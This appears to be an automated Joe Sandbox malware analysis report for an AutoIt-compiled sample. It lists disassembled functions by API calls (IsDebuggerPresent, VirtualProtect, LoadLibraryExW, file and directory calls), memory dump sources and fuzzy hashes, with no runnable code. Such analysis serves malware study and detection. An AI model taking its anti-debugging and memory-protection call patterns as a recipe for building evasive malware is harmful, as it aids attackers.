                                                                                                                • Opcode ID: 5c36d14471a618f58c3523387a56dfb64728fe45581eb0599d72a24b79ef32b2
                                                                                                                • Instruction ID: b749c7ad565c4a6d07f06631864e24d11e13753c32d6aed84a8868991df09fa8
                                                                                                                • Opcode Fuzzy Hash: 5c36d14471a618f58c3523387a56dfb64728fe45581eb0599d72a24b79ef32b2
                                                                                                                • Instruction Fuzzy Hash: A6226A70608385DFC728DF15C490B6ABBE1FF86704F15896DE89A9B262D731EC45CB82
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 4104443479-3962188686
                                                                                                                • Opcode ID: 29c2267d4c6760e3fefd892f37a94f3c346aef876ce289767ebb0cce1bc9297b
                                                                                                                • Instruction ID: 7a68bfe29c808e4681fb8e3c6ed380a27a60d50284bbd69481122fc88bdd1cb5
                                                                                                                • Opcode Fuzzy Hash: 29c2267d4c6760e3fefd892f37a94f3c346aef876ce289767ebb0cce1bc9297b
                                                                                                                • Instruction Fuzzy Hash: 68417D21B041DC6BDF219F5A8C517BE7BA6FB47304F286464FC8EDB282D6349D4483A2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                                                                • Instruction ID: edbdef98b70bac80b88816ad5e9cd81aa5dddb3f5b33209416c5e5937e97fb5d
                                                                                                                • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                                                                • Instruction Fuzzy Hash: 6E31B8B1704656AFC704DF69C8D1E69F3A9FF89320B158639E919CB391EB30E950CB90
                                                                                                                APIs
                                                                                                                • IsThemeActive.UXTHEME ref: 008E4834
                                                                                                                  • Part of subcall function 0090336C: __lock.LIBCMT ref: 00903372
                                                                                                                  • Part of subcall function 0090336C: DecodePointer.KERNEL32(00000001,?,008E4849,00937C74), ref: 0090337E
                                                                                                                  • Part of subcall function 0090336C: EncodePointer.KERNEL32(?,?,008E4849,00937C74), ref: 00903389
                                                                                                                  • Part of subcall function 008E48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008E4915
                                                                                                                  • Part of subcall function 008E48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008E492A
                                                                                                                  • Part of subcall function 008E3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008E3B68
                                                                                                                  • Part of subcall function 008E3B3A: IsDebuggerPresent.KERNEL32 ref: 008E3B7A
                                                                                                                  • Part of subcall function 008E3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009A52F8,009A52E0,?,?), ref: 008E3BEB
                                                                                                                  • Part of subcall function 008E3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 008E3C6F
                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008E4874
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1438897964-0
                                                                                                                • Opcode ID: 30986feb5b863fde8f3e7f200c794d3683f312daea88cbdcb1fe19d1b4d7ba34
                                                                                                                • Instruction ID: 72e9369afdc351b243f904cd159d8299b7040ec23c1df0a1b4bcf136719643b3
                                                                                                                • Opcode Fuzzy Hash: 30986feb5b863fde8f3e7f200c794d3683f312daea88cbdcb1fe19d1b4d7ba34
                                                                                                                • Instruction Fuzzy Hash: 4A118C719183959FC700EF2AE845A0ABBE8FF8A750F10852EF494832B1DBB09544DB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0090571C: __FF_MSGBANNER.LIBCMT ref: 00905733
                                                                                                                  • Part of subcall function 0090571C: __NMSG_WRITE.LIBCMT ref: 0090573A
                                                                                                                  • Part of subcall function 0090571C: RtlAllocateHeap.NTDLL(01440000,00000000,00000001,00000000,?,?,?,00900DD3,?), ref: 0090575F
                                                                                                                • std::exception::exception.LIBCMT ref: 00900DEC
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00900E01
                                                                                                                  • Part of subcall function 0090859B: RaiseException.KERNEL32(?,?,?,00999E78,00000000,?,?,?,?,00900E06,?,00999E78,?,00000001), ref: 009085F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902256705-0
                                                                                                                • Opcode ID: e1dc9c581ae1d493386ba34f83600df63c57f229d308455dcc2bbbb285bb3a71
                                                                                                                • Instruction ID: 9b924dad12610f2f16ce6f4465c188a21350e0a1852be077ed29eb651bd7bfc4
                                                                                                                • Opcode Fuzzy Hash: e1dc9c581ae1d493386ba34f83600df63c57f229d308455dcc2bbbb285bb3a71
                                                                                                                • Instruction Fuzzy Hash: 0DF0A43250431E6EDB20AB98EC05BDF77ECDF81311F10486AF948A62D1DF719A40D6E1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock_file_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 26237723-0
                                                                                                                • Opcode ID: 7b31f027ec3ae6d062aa2c2eda93a938835bbdf895af1fbc92a605f292e10206
                                                                                                                • Instruction ID: 275ea5f855ada424d473194e13171167a7ae0fdfdc46ec756cb967f89e1a4d69
                                                                                                                • Opcode Fuzzy Hash: 7b31f027ec3ae6d062aa2c2eda93a938835bbdf895af1fbc92a605f292e10206
                                                                                                                • Instruction Fuzzy Hash: 0E01F771800A08EFCF12AF68DC02A9F7B65AFD1321F464215F8241A1D1DB328E11DF91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00908B28: __getptd_noexit.LIBCMT ref: 00908B28
                                                                                                                • __lock_file.LIBCMT ref: 009053EB
                                                                                                                  • Part of subcall function 00906C11: __lock.LIBCMT ref: 00906C34
                                                                                                                • __fclose_nolock.LIBCMT ref: 009053F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2800547568-0
                                                                                                                • Opcode ID: 70ae666d10b734b6f0080823dc6ae20e58af5abc420a3bd591b4c2f38cf0c99a
                                                                                                                • Instruction ID: 7af5f524e11599e64014f5abfe8e4abc8e5106e4d5ab0a193b5c8b8d98f9ff33
                                                                                                                • Opcode Fuzzy Hash: 70ae666d10b734b6f0080823dc6ae20e58af5abc420a3bd591b4c2f38cf0c99a
                                                                                                                • Instruction Fuzzy Hash: DDF0BB31900A04DEDB107F7598027AF77E46FC1374F268204A4A4AB1C1CFFC89415F61
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01671F98: GetFileAttributesW.KERNELBASE(?), ref: 01671FA3
                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01672884
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateDirectoryFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3401506121-0
                                                                                                                • Opcode ID: 0cbd88b522e112101222fa742f4d8a65d6b784b1ad00e785f65063bf376e3622
                                                                                                                • Instruction ID: a7d304c6520bb3060dd88a84b3e9c1b7276084a0d20393dbde97e31e7b268e68
                                                                                                                • Opcode Fuzzy Hash: 0cbd88b522e112101222fa742f4d8a65d6b784b1ad00e785f65063bf376e3622
                                                                                                                • Instruction Fuzzy Hash: E4518031A1120997EF14EFA4CC54BEE733AEF58700F10856DA609F7280EB799B45CBA5
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction ID: 22bed1b4251c5156d0ba27194fd8e70463bcf29bf3d975d9d38dd25e717d9f25
                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction Fuzzy Hash: D431A570A001159FE718DF58C484A69F7A6FF99300F6886A5E88ACB395D731EDC1DB80
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: bbadebb149510d67ba7ee40583516f012edd7d6df8c88f2bf63206fa95218c82
                                                                                                                • Instruction ID: 38fcd873f4264ae54960eb29ebf669ee3cd77afa3a03432419a719b3ebe2fda2
                                                                                                                • Opcode Fuzzy Hash: bbadebb149510d67ba7ee40583516f012edd7d6df8c88f2bf63206fa95218c82
                                                                                                                • Instruction Fuzzy Hash: 07411574608395CFDB24DF25C454B1ABBE0FF85318F1988ACE8998B362C772E845CB52
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 8a7e5ca31b1e5e2c100db1863d29abd253cfc13b67f65ed040e568a79de5ea81
                                                                                                                • Instruction ID: b28be9c7707ee71f5df5b9af7bfd53511f8fef800994db5fc85166204c7ed998
                                                                                                                • Opcode Fuzzy Hash: 8a7e5ca31b1e5e2c100db1863d29abd253cfc13b67f65ed040e568a79de5ea81
                                                                                                                • Instruction Fuzzy Hash: AA212B72714A0DEBDB148F5AEC417AA7BB4FF94360F21852EE885C51A0EB3081D0D785
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 008E4BEF
                                                                                                                  • Part of subcall function 0090525B: __wfsopen.LIBCMT ref: 00905266
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008E4E0F
                                                                                                                  • Part of subcall function 008E4B6A: FreeLibrary.KERNEL32(00000000), ref: 008E4BA4
                                                                                                                  • Part of subcall function 008E4C70: _memmove.LIBCMT ref: 008E4CBA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1396898556-0
                                                                                                                • Opcode ID: b91caaaa751c2be00696d19a05ece36d2da79feeb0d21f242786f465e115e237
                                                                                                                • Instruction ID: 4ac02dcd1cfbbfa648f9b1a3cab93c958eb9547c6ffa913885d977d839eaa3c0
                                                                                                                • Opcode Fuzzy Hash: b91caaaa751c2be00696d19a05ece36d2da79feeb0d21f242786f465e115e237
                                                                                                                • Instruction Fuzzy Hash: 1411E73160024AABCF10AFB9C816FAE77A8FF85724F108429F559E7181DB7199009B52
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: cc0fbed0eefb790c70af42e6fbca75c870bb0b3f7122c6f6a6270bf435ef87db
                                                                                                                • Instruction ID: 71bcccb92e57274b32048c18c8f4e03c03e3bd5b493f895325b016e588ea6f65
                                                                                                                • Opcode Fuzzy Hash: cc0fbed0eefb790c70af42e6fbca75c870bb0b3f7122c6f6a6270bf435ef87db
                                                                                                                • Instruction Fuzzy Hash: EB2102B4A08345DFCB14DF24C844B2ABBE0BF89314F158968E99A97762D731E805CB92
                                                                                                                APIs
                                                                                                                • __lock_file.LIBCMT ref: 009048A6
                                                                                                                  • Part of subcall function 00908B28: __getptd_noexit.LIBCMT ref: 00908B28
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2597487223-0
                                                                                                                • Opcode ID: 78290b17ac6b859a48e5c2ba30794c816f39b489c9e8f01e7a13ae277f836282
                                                                                                                • Instruction ID: c3b97d1d70633227d717d975a0532f90209ac761ba1b245624312cc07bb7a518
                                                                                                                • Opcode Fuzzy Hash: 78290b17ac6b859a48e5c2ba30794c816f39b489c9e8f01e7a13ae277f836282
                                                                                                                • Instruction Fuzzy Hash: 7CF022B1A00608EFEF11AFB48C067AF37E4AF80324F098814FA209A1C1CB788D50DF41
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,?,009A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008E4E7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 631344dd89e864a097939ef5a348049b38999ceb09af0e51a7a94ce77d729c16
                                                                                                                • Instruction ID: ad497b080ac83673bd8fe7d7d2d1f7e7cb2f657721566face09077fe3c33d93a
                                                                                                                • Opcode Fuzzy Hash: 631344dd89e864a097939ef5a348049b38999ceb09af0e51a7a94ce77d729c16
                                                                                                                • Instruction Fuzzy Hash: DDF0A970104742CFCB349F26E494822BBE0FF023393209A7EE1EAC2620C332A840DF00
                                                                                                                APIs
                                                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009007B0
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongNamePath_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2514874351-0
                                                                                                                • Opcode ID: e663975ee93749af13c65bcb7382c936c94810f4e979c5d30b77d57851f8aebe
                                                                                                                • Instruction ID: 7a5bc0025d0005bb6494f310f445935df3fd4943cd829a79a03d955ce6b46120
                                                                                                                • Opcode Fuzzy Hash: e663975ee93749af13c65bcb7382c936c94810f4e979c5d30b77d57851f8aebe
                                                                                                                • Instruction Fuzzy Hash: 81E0CD37A0412867C721D65DAC05FEA77DDDFC97A0F0441B5FD0CD7204D9609C8086D1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2638373210-0
                                                                                                                • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                • Instruction ID: fb89c16492a57a2fe396245a7d86ed577cbf4565e60ec1d405ee7f3acefe9ad5
                                                                                                                • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                • Instruction Fuzzy Hash: DCE092B0104B009FD7389A24D800BA373E5AB05304F00081DF2AA83241EB6278418B59
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 01671FA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                • Instruction ID: b5eea2cb64797c24a9942b06a3c0fa4ee84c765c4f4aab978fc176f063b5562d
                                                                                                                • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                • Instruction Fuzzy Hash: 13E08C30A05208EBDB20DEBC8D04AE973E8EB16320F004B56E906C37C0D7388A00E650
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 01671F73
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
